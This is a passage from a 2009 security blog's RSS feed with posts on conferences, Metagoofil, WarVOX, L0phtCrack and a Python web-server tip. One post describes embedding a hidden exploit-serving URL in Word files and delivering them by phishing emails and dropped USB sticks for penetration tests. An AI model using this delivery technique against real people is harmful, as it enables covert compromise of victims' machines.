Source Boston</title><description>&lt;div style="text-align: left;"&gt;The&lt;a href="http://www.fistconference.org/?s=6&amp;amp;t=1"&gt; FIST Conference&lt;/a&gt; is over, i just came home and now i'm preparing my backpack for tomorrows trip to NY and Boston, were i will attend &lt;a href="http://www.sourceconference.com/"&gt;SOURCE Conference&lt;/a&gt; Boston :)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The talk of Jay Libove was very interesting, he made us think over the ethics in our career, and &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Vicente Diaz talk about eCrime economy showin&lt;/div&gt;&lt;div style="text-align: justify;"&gt;g some unbelievable facts and numbers, we are really outnumbered... My talk was about Information Gathering, Metadata and Social Networks, showing how easy is to obtain information about individuals and companies.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The slides will be available soon at www.fistconference.org&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here is a screenshot of the next Metagoofil version that i showed today:&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://3.bp.blogspot.com/_CzwlRHDUh5c/SbGsnqdxFwI/AAAAAAAAAQM/-_X9qqupsjE/s320/Metagoofilv2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5310215233060542210" /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Yes it has the "Analyze local files" that many of you asked for :)&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-6695122873475401292?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/fist-conference-source-boston.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_CzwlRHDUh5c/SbGsnqdxFwI/AAAAAAAAAQM/-_X9qqupsjE/s72-c/Metagoofilv2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-7995785583625739347</guid><pubDate>Thu, 05 Mar 2009 07:53:00 +0000</pubDate><atom:updated>2009-03-05T09:16:33.018+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">wardialing</category><category domain="http://www.blogger.com/atom/ns#">tools</category><title>Warvox: Wardialing refreshed</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.warvox.org/logo4.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 450px; height: 157px;" src="http://www.warvox.org/logo4.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The people of Metasploit released a new tool for performing Wardialing attacks. You must be wondering why a new wardialing tool in these times?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Well they came with a new idea, on using Voip services to perform the scans and they claim to reach 10.000 numbers in 8 hours aprox. No modem needed, yes you read right.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="  line-height: 22px; font-family:Tahoma;font-size:15px;"&gt;&lt;blockquote&gt;One of the great things about the WarVOX model is that once the data has been gathered, it is archived and available for re-analysis as new signatures, plugins, and tools are developed.&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;Also is interesting the analysis they perform, because they identify more things than a modem attached to a telephone line:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="  line-height: 22px; font-family:Tahoma;font-size:15px;"&gt;&lt;blockquote&gt;This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system.&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 450px; height: 350px;" src="http://www.warvox.org/gallery/results.png" border="0" alt="" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The tool is coded in ruby and you can download &lt;a href="http://www.warvox.org/"&gt;here&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-7995785583625739347?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/warvox-wardialing-refreshed.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-618268801402441619</guid><pubDate>Tue, 03 Mar 2009 22:06:00 +0000</pubDate><atom:updated>2009-03-03T23:22:42.375+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">tips</category><title>Quick tip: Sharing a directory over the web easily</title><description>Sometimes you need to share a file, show someone a file, serve a client side exploit in a local network, but you don't have a web server on your machine, or don't want to upload the file to a server... Here is a very useful tip to run a web server serving the actual directory with Python:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana; font-size: 13px; "&gt;shell&gt;python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;there is an easier way:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;shell&gt;python -m SimpleHTTPServer&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;By the default it will use the port 8000.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;You can create an alias for easy launching&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;More shell tricks in &lt;a href="http://www.shell-fu.org"&gt;Shell-fu.org&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana;font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;-CMM&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-618268801402441619?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/quick-tip-sharing-directory-over-web.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-6994490259884533205</guid><pubDate>Mon, 02 Mar 2009 23:19:00 +0000</pubDate><atom:updated>2009-03-03T00:51:38.206+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">client side</category><category domain="http://www.blogger.com/atom/ns#">exploits</category><category domain="http://www.blogger.com/atom/ns#">metasploit</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>Client Side exploit Delivery - Word files</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Today i will do a brief post about how you can deliver an exploit URL to your target.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;I was reading the &lt;a href="http://isc.sans.org/diary.html?storyid=5899"&gt;SANS storm post&lt;/a&gt; about MS09-002 XML/DOC initial infection vector, and i wanted to try it. Here is the information from SANS:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 562px; height: 304px; " src="http://handlers.sans.org/bzdrnja/xml.png" border="0" alt="" /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;After many failed attempts and some research, i stumble and &lt;a href="http://www.securityfocus.com/archive/1/492231"&gt;old post&lt;/a&gt; about a XSS in Word documents where the steps to accomplish the XSS where:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 87px; " src="http://4.bp.blogspot.com/_CzwlRHDUh5c/SaxsZc2QhmI/AAAAAAAAAPk/Viag2150-qQ/s320/ishot-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308737245259269730" /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;The html file content:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 48px; " src="http://3.bp.blogspot.com/_CzwlRHDUh5c/Saxslz25vsI/AAAAAAAAAPs/eB-yPk_P2w4/s320/ishot-3.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308737457594416834" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;So if you change the value code by your exploit serving URL, you will get your exploit served when the target open the Word document.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;In this example i changed the value by "http://www.google.com" and the results when opening the word file:&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 274px; height: 320px; " src="http://4.bp.blogspot.com/_CzwlRHDUh5c/Saxt7L9RjsI/AAAAAAAAAP0/fxGdVKgJYMY/s320/ishot-1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308738924352474818" /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt; And in the next page is the little frame with the page loaded:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 317px; " src="http://1.bp.blogspot.com/_CzwlRHDUh5c/SaxubGDqoxI/AAAAAAAAAP8/jQBs9AwS1sA/s320/ishot-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308739472524485394" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;For doing it in a cleaner way, your page will be blank, so there will be no trace at plain sight for a typical user. Also it's possible to play with the object size and location. Also depending on the configuration the user will receive an alert saying that an Activex is trying to run.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;So for your next penetration test when you need to perform a targeted client side attack,  fire up Metasploit, setup MS09-002  build a Word file, send emails with juicy Subjects , leave some USB sticks on the building and wait :)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-6994490259884533205?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/client-side-exploit-delivery-word-files.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_CzwlRHDUh5c/SaxsZc2QhmI/AAAAAAAAAPk/Viag2150-qQ/s72-c/ishot-2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-8475961415846177712</guid><pubDate>Sun, 01 Mar 2009 18:51:00 +0000</pubDate><atom:updated>2009-03-01T20:09:39.737+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">conference</category><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>L0phtCrack is back with L0pht</title><description>&lt;div style="text-align: justify;"&gt;I read via Christien Rioux &lt;a href="http://twitter.com/dildog"&gt;twitter&lt;/a&gt;, that L0phtCrack is being reacquired by the original authors. &lt;/div&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;They are preparing a special information session at &lt;a href="http://www.sourceconference.com/"&gt;SOURCE Boston&lt;/a&gt; (Thursday 10:15 am), and they will be releasing version 6. Also they will explain the story of the product from the days of L0pht, @stake, Symantec and L0pht again.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Check this &lt;a href="http://www.l0phtcrack.com/"&gt;site&lt;/a&gt; for more info soon.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;I will be there for this session! &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM &lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-8475961415846177712?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/l0phtcrack-is-back-with-l0pht.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-2651721922523941433</guid><pubDate>Thu, 26 Feb 2009 20:12:00 +0000</pubDate><atom:updated>2009-02-26T21:20:13.667+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>15 Minutes Penetration test</title><description>Here you have two interesting videos from Ryan Linn on EthicalHacker.net , reviewing a fast Penetration Test using Nmap, Nessus, Metasploit / Meterpreter and  Ophcrack.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.ethicalhacker.net/content/view/227/24/"&gt;Video part 1&lt;/a&gt; Nmap, Nessus, Metasploit&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.ethicalhacker.net/content/view/238/24/"&gt;Video part 2&lt;/a&gt; Meterpreter, Ophcrack, Command line users&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This is a good time to say how much i like meterpreter :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-2651721922523941433?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/15-minutes-penetration-test.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-2308263861356992272</guid><pubDate>Wed, 25 Feb 2009 23:19:00 +0000</pubDate><atom:updated>2009-02-26T00:43:11.042+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><title>Google Safe  Browsing Diagnostic</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_CzwlRHDUh5c/SaXXd-RJIxI/AAAAAAAAAPU/nkbKHfnaPV4/s1600-h/ishot-2.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 228px; height: 41px;" src="http://4.bp.blogspot.com/_CzwlRHDUh5c/SaXXd-RJIxI/AAAAAAAAAPU/nkbKHfnaPV4/s320/ishot-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5306884645857075986" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Today i read about Google Safe Browsing Diagnostic report, and it's really interesting.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Google is providing a security diagnostic report about web sites, where they give:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;&lt;div&gt;*What is the current listing status for [the site in question]?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We display the current listing status of a site and also information on how often a site or parts of it were listed in the past.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*What happened when Google visited this site?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This section includes information on when we analyzed the page, when it was last malicious, what kind of malware we encountered and so fourth. To help web masters clean up their site, we also provide information about the sites that were serving malicious software to users and which sites might have served as intermediaries.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*Has this site acted as an intermediary resulting in further distribution of malware?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here we provide information if this site has facilitated the distribution of malicious software in the past. This could be an advertising network or statistics site that accidentally participated in the distribution of malicious software.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;*Has this site hosted malware?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here we provide information if the the site has hosted malicious software in the past. We also provide information on the victim sites that initiated the distribution of malicious software.&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This service is very useful and is similar to McAfee Site Advisor, you can check an example report for &lt;a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;amp;hl=en-US&amp;amp;site=doubleclick.net/"&gt;doubleclick.net&lt;/a&gt; here where in the past malware was detected.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This report is what google knows about the security of a site, better said the potential security risks that you can find in a site.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You can access this service via the website, or via Firefox "additional information"&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;More information in the &lt;a href="http://googleonlinesecurity.blogspot.com/2008/05/safe-browsing-diagnostic-to-rescue.html"&gt;Google blog&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-2308263861356992272?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/google-safe-browsing-diagnostic.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_CzwlRHDUh5c/SaXXd-RJIxI/AAAAAAAAAPU/nkbKHfnaPV4/s72-c/ishot-2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-108709861762371881</guid><pubDate>Wed, 25 Feb 2009 23:03:00 +0000</pubDate><atom:updated>2009-02-26T00:18:01.394+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">conference</category><title>FIST Conference Barcelona March 2009</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_CzwlRHDUh5c/SaXPYEy2EfI/AAAAAAAAAPE/TgnfJS1P0_4/s1600-h/ishot-1.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 259px; height: 80px;" src="http://2.bp.blogspot.com/_CzwlRHDUh5c/SaXPYEy2EfI/AAAAAAAAAPE/TgnfJS1P0_4/s320/ishot-1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5306875748436808178" /&gt;&lt;/a&gt;&lt;br /&gt;Next March 6th  we are throwing a new edition of the FIST Conference here in Barcelona, so if you want to check the program, you can go &lt;a href="http://www.fistconference.org/?s=6&amp;amp;t=1"&gt;here&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I will give a talk about "A fresh new look into information gathering", where i intend to present the new beta version of the &lt;a href="http://www.edge-security.com/metagoofil.php"&gt;Metagoofil&lt;/a&gt;, and some new sources for Information Gathering.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vicente Díaz will continue the &lt;a href="http://www.edge-security.com/docs/eCrime.pdf"&gt;talk&lt;/a&gt; he gave at the last FIST Conference with new information and facts about cyber crime and the business behind it (or in front of it), very interesting and entertaining talk.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The location has changed, and this edition will be inside the FiberParty 2009 event.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;After the conference we flight to USA, first NY and then we head to BOSTON, to attend &lt;a href="http://www.sourceconference.com/"&gt;SOURCE Conference&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please join us at FIST Conference :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-108709861762371881?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/fist-conference-barcelona-march-2009.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_CzwlRHDUh5c/SaXPYEy2EfI/AAAAAAAAAPE/TgnfJS1P0_4/s72-c/ishot-1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-6517095173638892172</guid><pubDate>Thu, 19 Feb 2009 23:04:00 +0000</pubDate><atom:updated>2009-02-20T00:32:51.898+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">conference</category><title>Black Hat DC 2009 - Slides</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_CzwlRHDUh5c/SZ3rYlc0xoI/AAAAAAAAAO0/LNJnD1GbZk8/s1600-h/ishot-1.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="http://2.bp.blogspot.com/_CzwlRHDUh5c/SZ3rYlc0xoI/AAAAAAAAAO0/LNJnD1GbZk8/s320/ishot-1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5304654743714711170" /&gt;&lt;/a&gt;&lt;br /&gt;The presentations of the last Black Hat DC conference are available online, here are some interesting talks:&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;DNS 2008 and the New (old) Nature of Critical Infrastructure, Dan Kaminsky&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Windows Vista Security Internals, Michael Mukin&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Dissecting web attacks, Val Smith &amp;amp; Colin Ames&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You can download the presentations &lt;a href="http://www.blackhat.com/html/bh-dc-09/bh-dc-09-archives.html"&gt;here&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-6517095173638892172?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/02/black-hat-dc-2009-slides.html</link><author>noreply@blogger.com (Christian Martorella)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_CzwlRHDUh5c/SZ3rYlc0xoI/AAAAAAAAAO0/LNJnD1GbZk8/s72-c/ishot-1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-5743447470597657663</guid><pubDate>Mon, 16 Feb 2009 22:52:00 +0000</pubDate><atom:updated>2009-02-17T00:26:26.873+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">exploits</category><category domain="http://www.blogger.com/atom/ns#">python</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category 